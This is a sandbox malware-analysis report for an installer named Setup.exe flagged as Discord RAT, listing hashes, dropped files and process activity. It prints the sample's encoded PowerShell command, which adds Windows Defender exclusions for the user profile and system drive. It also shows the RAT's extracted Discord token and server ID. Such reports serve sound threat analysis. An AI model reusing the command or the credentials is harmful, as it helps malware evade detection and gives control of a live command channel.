Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
131s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
09/03/2024, 12:00
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Setup.exe
Resource
win10v2004-20240226-en
General
-
Target
Setup.exe
-
Size
26.9MB
-
MD5
f6d14262dedf30fe406a6a83bc285848
-
SHA1
8fcffcb218cb7b759a26c3125d03246c9eb60308
-
SHA256
9258d993b240a43e7c595db26b9f04a7e620a240a2ade29ab1daff528462a517
-
SHA512
51075d388a5c280c999c37d182de08e4989f8ad2af4bb02c012c5f0e5fe5be99ea5579e3adab6e29653798110f77af9c78328aca7e9ac4054b4a8753ca01cad7
-
SSDEEP
393216:vW3AUWON8SUpFLkl5J3TEaQMlPpSEh58UEmnoFDki+4Cs/nhKDX+m64qHIsn6P:+OOtUAljoaFfSAhr2Cs5KDXvqH3n6
Malware Config
Extracted
discordrat
-
discord_token
MTIwNDk0MjY0MDY0MzMxMzc0NQ.G2mhX6.W77F5TMZuCC1U8GHoOD8TxwembX1ccz-N2lX0U
-
server_id
1205273351032143953
Signatures
-
Discord RAT
A RAT written in C# using Discord as a C2.
-
Executes dropped EXE 6 IoCs
pid Process 3004 Run.exe 2936 Test (2).exe 468 Test.exe 1276 Test.exe 1528 Test (2).exe 1200 Process not Found -
Loads dropped DLL 14 IoCs
pid Process 2472 Setup.exe 2472 Setup.exe 2472 Setup.exe 468 Test.exe 2936 Test (2).exe 1528 Test (2).exe 1276 Test.exe 1200 Process not Found 1200 Process not Found 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe 2224 WerFault.exe -
resource yara_rule behavioral1/files/0x000500000001a490-181.dat upx behavioral1/files/0x000500000001c863-180.dat upx behavioral1/files/0x000500000001c863-183.dat upx behavioral1/files/0x000500000001a490-182.dat upx behavioral1/memory/1528-187-0x000007FEF3960000-0x000007FEF3DCE000-memory.dmp upx behavioral1/memory/1276-188-0x000007FEF34F0000-0x000007FEF395E000-memory.dmp upx -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Saved Games\Microsoft Games\desktop.ini solitaire.exe -
Detects Pyinstaller 5 IoCs
resource yara_rule behavioral1/files/0x000800000001227e-10.dat pyinstaller behavioral1/files/0x000800000001227e-13.dat pyinstaller behavioral1/files/0x000800000001227e-12.dat pyinstaller behavioral1/files/0x000800000001227e-179.dat pyinstaller behavioral1/files/0x000800000001227e-193.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 8 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats solitaire.exe Set value (int) \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{8669ECE8-D1C3-4345-8310-E60F6D44FDAF}\LastPlayed = "0" solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\GameStats\{8669ECE8-D1C3-4345-8310-E60F6D44FDAF} solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows solitaire.exe Key created \REGISTRY\USER\S-1-5-21-3787592910-3720486031-2929222812-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX solitaire.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2600 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1276 Test.exe 2436 solitaire.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2600 powershell.exe Token: 33 2992 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2992 AUDIODG.EXE Token: 33 2992 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2992 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 2472 wrote to memory of 2600 2472 Setup.exe 28 PID 2472 wrote to memory of 2600 2472 Setup.exe 28 PID 2472 wrote to memory of 2600 2472 Setup.exe 28 PID 2472 wrote to memory of 2600 2472 Setup.exe 28 PID 2472 wrote to memory of 3004 2472 Setup.exe 30 PID 2472 wrote to memory of 3004 2472 Setup.exe 30 PID 2472 wrote to memory of 3004 2472 Setup.exe 30 PID 2472 wrote to memory of 3004 2472 Setup.exe 30 PID 2472 wrote to memory of 2936 2472 Setup.exe 31 PID 2472 wrote to memory of 2936 2472 Setup.exe 31 PID 2472 wrote to memory of 2936 2472 Setup.exe 31 PID 2472 wrote to memory of 2936 2472 Setup.exe 31 PID 2472 wrote to memory of 468 2472 Setup.exe 32 PID 2472 wrote to memory of 468 2472 Setup.exe 32 PID 2472 wrote to memory of 468 2472 Setup.exe 32 PID 2472 wrote to memory of 468 2472 Setup.exe 32 PID 468 wrote to memory of 1276 468 Test.exe 33 PID 468 wrote to memory of 1276 468 Test.exe 33 PID 468 wrote to memory of 1276 468 Test.exe 33 PID 2936 wrote to memory of 1528 2936 Test (2).exe 34 PID 2936 wrote to memory of 1528 2936 Test (2).exe 34 PID 2936 wrote to memory of 1528 2936 Test (2).exe 34 PID 3004 wrote to memory of 2224 3004 Run.exe 35 PID 3004 wrote to memory of 2224 3004 Run.exe 35 PID 3004 wrote to memory of 2224 3004 Run.exe 35
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAeQBrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHEAcwBmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGUAdgB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG0AeQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2600
-
-
C:\Users\Admin\AppData\Local\Temp\Run.exe"C:\Users\Admin\AppData\Local\Temp\Run.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3004 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3004 -s 5963⤵
- Loads dropped DLL
PID:2224
-
-
-
C:\Users\Admin\AppData\Local\Temp\Test (2).exe"C:\Users\Admin\AppData\Local\Temp\Test (2).exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2936 -
C:\Users\Admin\AppData\Local\Temp\Test (2).exe"C:\Users\Admin\AppData\Local\Temp\Test (2).exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1528
-
-
-
C:\Users\Admin\AppData\Local\Temp\Test.exe"C:\Users\Admin\AppData\Local\Temp\Test.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Users\Admin\AppData\Local\Temp\Test.exe"C:\Users\Admin\AppData\Local\Temp\Test.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
PID:1276
-
-
-
C:\Program Files\Microsoft Games\solitaire\solitaire.exe"C:\Program Files\Microsoft Games\solitaire\solitaire.exe"1⤵
- Drops desktop.ini file(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2436
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x5041⤵
- Suspicious use of AdjustPrivilegeToken
PID:2992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD52af4061d890846d17060701e62ae6e93
SHA12c770c092a0ad0c18b233126cdf456e0d6ff14b7
SHA25656daaf3356d557d6685182de943e3668e1d255cf618922c1063b4e964f2038f3
SHA5121295e9603771fa3feaefcaa6a0ea90aae5e4e3a0eb7011fbb445c1f2eb434213797145090c10de999717db87cdc1f057236b12d93bc2886131ae861637a6a27b
-
Filesize
1.8MB
MD54291f0c85d02e37aa173a044ec6afcdc
SHA19e51e2d5fe54b82bffc6404a98ff78e9921bd4bf
SHA25672b61114e4a713857eb0236a8de2d817d072e9630cb0a1dcb1566e13cff7ca27
SHA5129c61f1c42e16f1c54aebae14d1fc0a058ff0941b1126e3feb1b6e2f74b5e6a94a27317726858e4711d48b55f59d07e74a83487eb35f962f61f6c1a61f1cde0b1
-
Filesize
640KB
MD55f9d6ece175e06dee97948d84c62e073
SHA11ff39183fd2ae3427effa697beeebcb7ddc55cd2
SHA256f2303f6fc029b88c65e01ff5d11f7c872689e93086ca31fbd0573bf61c1c57fd
SHA51200ee27d7693e1c20a1d0845b79e2d826c8ac1521882359489530a1b6ad77530963889b92d536ad7692aada46bd73ddabca9fe0fdaa1d2c925ea49ef080335e55
-
Filesize
1.5MB
MD5dee5db32e69c12bf0a757d6f242c9496
SHA12367e082e40a29a0b39369bfcc175bfe64096eab
SHA25680d1a2f37a1202976b9570dc7c6c726b14bd0321a5c104807930d7d099b3d91f
SHA5129045be2efd22eeef03c94df08685fb019ca636674714e3377e74e36724c17baf152316bf9fdd0f602bafad5810360c6f4edc1d900d3b2f64aab224c650e9a9bf
-
Filesize
128KB
MD58f0e8b004c316c697152271e4a581bf8
SHA126e8eca220f5532f21a9553780f931ec0e05191a
SHA2563936562e9c36551c6fc08e7f9e667168f2cdd20b66210eba3d17886fa9e5c7c7
SHA51277f4adb917bdb7ffb4efc54f3861d824ed02b7c583974534328ab5ea7fe21ad237c39275d2eae649331b836548f5d4f0056ce8c2aed239a31911a1f9bf05d682
-
Filesize
86KB
MD531b53c965eed05b15682c6405ed55b6e
SHA156dfba4cc611f282b6f57297f468633db1c4002c
SHA2566e09b5780a755e445a4124ef97055edceee3bba46b14c18717450286d22465b7
SHA51217c91d20c147f06775ac5ff85911ad26bcc43990f7299545d269e894d3c0207069e938fac93671955f5cf34c6ea802420194411799c518bdf8948e71860dd63a
-
Filesize
640KB
MD52419dff7a302d83713618e5ed166ad1b
SHA1208bb4a375c578c5ea0b0f17ccf945f5fb7b0461
SHA2561467a950028a7bbe52210e14ae6f2555852f1f397b670c133d47ec60deeda357
SHA5127ba3ec30922fce68176e2825d6c37966fee2f019d5522c3c58297ea8407171cdacca60f73c2f5169672a18b5f85869adba0a7f6d7e9d5fd950b615575f2e3c8c
-
Filesize
4B
MD5365c9bfeb7d89244f2ce01c1de44cb85
SHA1d7a03141d5d6b1e88b6b59ef08b6681df212c599
SHA256ceebae7b8927a3227e5303cf5e0f1f7b34bb542ad7250ac03fbcde36ec2f1508
SHA512d220d322a4053d84130567d626a9f7bb2fb8f0b854da1621f001826dc61b0ed6d3f91793627e6f0ac2ac27aea2b986b6a7a63427f05fe004d8a2adfbdadc13c1
-
Filesize
640KB
MD560666fe1040aae3ecbdef82987afea01
SHA18752e107d63c875a55e13d0bd592a15d539b3662
SHA2563d24eb9147ca2a7812c04b134dc891e2cf7ffe0102e46de207078f98c5f62b9e
SHA512993ee4c47095631b24ba6e7402fc20d70a8812837ac9b2f991dc6fc938a7dda8e656fda69fee3c6f5271895a88e67ce1fb68c0afeaecc8fa48259b2489853742
-
Filesize
8KB
MD57d6a68273a8a4c6865e335fe7b3f1edd
SHA156683fb683b9e6eafc8ccfe63ce3c8ad636e468d
SHA256e0d3bc592f4cda5462e1a1115d266fea01b9a9b59134e67a3431520bdcfc0091
SHA5124817ab67cec2def533672ccdd917938d23d0d7037ab0df07f3179725126a72931c9ec41b7fbe4a09d764649bf37369944132b416a903bc305c22440c68e7c56c
-
Filesize
78KB
MD5da55323342e95b551c35bdacfe00529f
SHA15239b5b6087e453547435c4784a9b00fb6d0b482
SHA2569700f5eb933349c709fd86994da9c744e4a27c54fdf4565fd1c3f0f3e9b0bab8
SHA5128117b2f7757ebe68b9e6c27dd7d6f39c79cac71a01500d18f3f35440c8502b95c8c4cda80e064897d4b356d439311923f28af84bee53985fe6798f1308ac8940
-
Filesize
3.6MB
MD5bcec453ae3dd2444e86c1e409ed10ba2
SHA1781c46213f5eee2f31f63200faf1b4ec4ec6314e
SHA25635038b85b94286e8d8e004d85b06022b3a137ec75e417a677f404d834b8361c1
SHA512ffe1d9b1a9d067e7c75cb5cb4b50936b5c35d816e35ffc0354fed4a9443f02369d2b821f5e2bc327f837c587b109a71a527dc4e058f2a692a9510873be40e43d
-
Filesize
1.4MB
MD5fa5eaae26b109d1a99e9e94cd57d1f03
SHA1a8bf27a5483b2bdd3ef58d79fc9b7dd4505a22df
SHA256be6575e71df6cc186af96fef0da5d7fe747ce4d564a775ebe1bcbd2fcac699f0
SHA512945ab06686c075a21641c39aaf37b9c4e08954271bda6ef50dfda7f79975bce4b89da15746b5476a3622c158f3ffe5929ec55762094eb730f95dd4707fc8f111
-
Filesize
1.8MB
MD59e6d59b5163cb3b136137196c33294ad
SHA1ec8da9928c1775202657c33dd4afe77d7847084a
SHA2568b12ec4cc2b02cec3b71567c29417eb9701a2e17a04f9f483458908f81851fbc
SHA512ff719797d97511c59927bc84f43d85341fd191bb637d94186ecbf78d81da5fe6d97a48da874589cd4b760a474346122eb123d8d934deffab564b08379d7db20c
-
Filesize
576KB
MD55959907030b5afc8d8b0972b00877fdd
SHA118fd4a8e0e41de9479ca0309a608094ab4d3935b
SHA2560e4b364a40e45906027100ae29cf25293ec69a0f3911b84ce460cc97d9c9a09a
SHA51222d55c5c837fdd96751d458d7802f5554ddbeff1779ee0b609c175b0188ed4301a78ff423ac2bc17514985515d9f67fa9edd8b06b0b15f8a036c1f1424eed242
-
Filesize
512KB
MD5c9ef8eb289949be39ea078228aa4ebba
SHA1682f84d4eff4d8613ef5218b5b189103c6be2170
SHA256a130d35247eeb5e3bd70834ef9866e5b238028b85a19b26178729a81c8d7cffc
SHA51284b6c39feda52ebba963b1c3a9b6ce69dcf9df9807761e36a89bd77554c0352fbe677a61df90729b0e67c0f404a22cd55304822b4aa2a97d4953b8abc2020e93
-
Filesize
1.4MB
MD569d4f13fbaeee9b551c2d9a4a94d4458
SHA169540d8dfc0ee299a7ff6585018c7db0662aa629
SHA256801317463bd116e603878c7c106093ba7db2bece11e691793e93065223fc7046
SHA5128e632f141daf44bc470f8ee677c6f0fdcbcacbfce1472d928576bf7b9f91d6b76639d18e386d5e1c97e538a8fe19dd2d22ea47ae1acf138a0925e3c6dd156378
-
Filesize
768KB
MD53e595060e476451204f0685f007ca9c1
SHA180d6dba2cc30c27b52719ce1b94292224b1dbf4b
SHA256350d5e41398195957d835018eacc4d50c94630bbca7a193bfbe2c813373242a6
SHA512e6314ce325c6786d2c32256a27034e697f4c38f6cbc0764dffa1987f8f51223969880012c4bb389b9a8f773a2a03505fcb4bb4f1863f076e4651917363adcc34